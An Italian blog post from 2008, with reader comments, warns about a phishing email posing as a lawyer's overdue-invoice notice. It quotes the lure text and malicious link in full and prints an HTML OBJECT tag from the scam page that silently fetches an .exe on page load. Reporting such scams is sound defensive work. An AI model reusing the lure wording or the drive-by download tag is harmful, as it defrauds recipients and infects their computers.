Anna mi ha appena passato un minaccioso messaggio che le era arrivato per email. Il testo è il seguente:
Subject: Avviso di insoluto su Fattura
Gentile Cliente,
Da un nostro controllo contabile non ci risulta a tutt'oggi il pagamento della fattura P.N. 335624-1 dell'importo di Euro 4.329,50.
Se la fattura risulta gia saldata o se ritiene possa sussistere un errore cotabile la invito a prendere visione del conto da pagare attraverso il nostro:
www.avvocati-ass.com/Fatturazione_CEF/FTR-335624.html ( clicca per collegarti )
In difetto, provvederò ad agire nelle sedi opportune, senza ulteriore preavviso.
Distinti saluti.
Dott.Avv. Giancarlo Gentiloni
I miei affezionati lettori avranno immediatamente notato i due errori di grammatica (“gia saldata” ed “errore cotabile“) e avranno capito che si tratta di un phishing. In effetti, cliccando sul link, esce una pagina dal titolo intimidente ATTO DI DIFFIDA E MESSA IN MORA e l’immagine di una pagina rimpicciolita in modo che non possa leggerla. Se avete un PC windows, non provate a cliccare né sulla pagina né sulla scritta “ingrandisci”, visto che verrebbe immediatamente scaricato un file .exe che non voglio affatto sapere cosa faccia.
Inoltre, guardando il sorgente di quella pagina, c’è anche il codice seguente: <OBJECT CLASSID="CLSID:F16FEB0E-2A86-4228-AFF1-E7500263A51F" CODEBASE="Fatt56563A.exe" width="1" height="1"></OBJECT> che potrebbe dare dei guai anche senza cliccare su quelle immagini, solo aprendo la pagina di cui sopra. Non dite che non vi ho avvertiti!
ps: se uno va a fare un controllo whois sul nome a dominio avvocati-ass.com, scopre che è stato registrato attraverso una società californiana che nasconde il nome del gestore vero e proprio, e soprattutto scopre che è stato registrato sabato pomeriggio scorso: Creation date: 19 Jan 2008 14:27:36. Se poi si vuole divertire, può andare alla pagina di informazioni, dove scopre – ma non c’è nulla di strano – che il sito è cinese… Il curiosone può anche andare all’indirizzo IP corrispondente e vedere un po’ di ideogrammi che Babelfish mi traduce più o meno come “il tuo sito non è stato ben configurato”. Ma forse quando voi leggerete questa mia notiziola, l’IP sarà cambiato: il sito infatti dice che il client può salvare l’indirizzo per non più di tre minuti (il default è da uno a tre giorni :-) )
Aggiornamento: (h 21:50) A quanto pare, questa notiziola mi ha fatto raggiungere nuove vette di contatti, più che i miei pipponi con Ratzi della scorsa settimana. D’altra parte, in questo momento non solo una ricerca per “avvocati-ass.com” riporta il mio blog al primo posto (fregando altri che ne avevano parlato prima di me…), ma non ci sono occorrenze al di fuori del circuito dei blog e dei forum. Quindi nulla dai grandi quotidiani online, ma soprattutto nulla dalle società che si fanno pagare per le loro “soluzioni di sicurezza”. Magari poi i loro prodotti bloccano il troiano, ma per molta gente loro sono la Fonte di Tranquillità, e un avvisino sul loro portale sarebbe stato utile. O no?
Ultimo aggiornamento: 2008-01-21 14:18
Ma l’indirizzo “avvocati-ass” va inteso in inglese?
Ok, battutaccia, comunque questa è veramente subdola come variante di phishing…
Non mi ricordo invece se ne hai parlato. A me questa estate ne arrivò una tedesca veramente str….
Per posta normale, arriva una bella lettera in ufficio del “Registro Italiano in Internet” in cui ci chiedono di aggiornare i dati del nostro nome a dominio…
Fortuna che ero lì quando hanno hanno aperto la lettera e mi hanno chiesto di dargli un’occhiata… se arrivava direttamente al nostro amministratore era la volta che ci cascavano…
In realtà si trattava di due fogli… uno che ti parlava di una richiesta di aggiornamento gratuita dei tuoi dati, mandando una mail ad un indirizzo di posta elettronica. Il secondo foglio era un modulo con la richiesta dei dati, ma leggendo per bene ti accorgevi che non stavi mandando i tuoi dati per l’aggiornamento gratuito di cui si parlava nel primo foglio (per quello c’era l’indirizzo email) ma stavi compilando una richiesta di inserimento (a pagamento e pure salato, roba di migliaia di euro) in questo “Registro Italiano in Internet”, che altro non è che un sito web fatto da una società editrice tedesca dall’etica abbastanza dubbia. Sono già stati multati dal garante per pubblicità ingannevole, ma evidentemente i soldi che fanno con questi sistemi sono di più della multa.
La lettera era veramente credibile.. se non hai ben chiaro come funziona il mantenimento dei nomi a dominio e non leggevi bene tutto quello che c’era scritto (anche in piccolino) c’era veramente il rischio di cascarci.
Mi è arrivata oggi questa email
“Gentile Cliente,
Da un nostro controllo contabile non ci risulta a tutt’oggi il pagamento della fattura P.N. 335624-1 dell’importo di Euro 4.329,50.
Se la fattura risulta gia saldata o se ritiene possa sussistere un errore cotabile la invito a prendere visione del conto da pagare attraverso il nostro:
http://www.avvocati-ass.com/Fatturazione_CEF/FTR-335624.html ( clicca per collegarti ) http://www.avvocati-ass.com/Fatturazione_CEF/FTR-335624.html>
In difetto, provvederò ad agire nelle sedi opportune, senza ulteriore preavviso.
Distinti saluti.
Dott.Avv. Giancarlo Gentiloni
Ho capito che è una fregatura!
Grazie per l’avvertimento
Anche a me è arrivata l’e-mail dell’Avv. Gentiloni e devo essere sincero inizialmente sono rimasto un pò allibito, anche perchè nel 2007 sono stato vittima della clonazione del bancomat (esperienza che non auguro a nessuno, sia materialmente che psicologicamente), poi fiutando una truffa ho fatto una ricerca con google ed ho trovato questo blog fantastico che mi ha chiarito le idee definitivamente. Il fatto strano, che conferma quanto sopra citato, è l’orario di invio cioè le 06,20 del mattino del 20.01.08, ovvero di domenica (in Italia) alle 06,20 l’Avv. Gentiloni fa il recupero crediti!!! Adesso l’unico dubbio che mi rimane è quello di segnalare il fatto alla polizia postale per una eventuale denuncia.
Grazie a tutti quelli che hanno postato.
(p.s.: Avv. Gentiloni… a lavorare in Siberia!!)
Faccio parte di un’associazione di volontariato e mi sono sentita male quando ho letto sulla posta la stessa identica mail inviata da Anna.
Cosa si può fare per ovviare a queste cose?
Liliana
@liliana: in effetti avevo notato che oggi stava arrivando al mio sito tanta gente che faceva ricerche sull'”avvocato Gentiloni” e simili. Credo sia partito un nuovo attacco.
Per “ovviare” a queste cose non credo si possa fare nulla, visto che i siti dove uno viene invitato a cliccare non sono situati in Italia: per il resto, a parte non usare Internet Explorer (che è l’unico browser con cui cliccando sul sito veniva scaricato il programma maligno) l’unico consiglio che posso dare è non fidarsi mai di nulla e fare una ricerca in rete. In genere, il sito di Paolo Attivissimo è sempre aggiornato al riguardo, ad esempio di questa truffa ne parla qua.
(Disclaimer: non sono affiliato in nessun modo ad Attivissimo, non lo conosco nemmeno, e secondo me ha buttato via senza leggerli quei pochi mail di segnalazione che gli ho inviato negli anni :-) )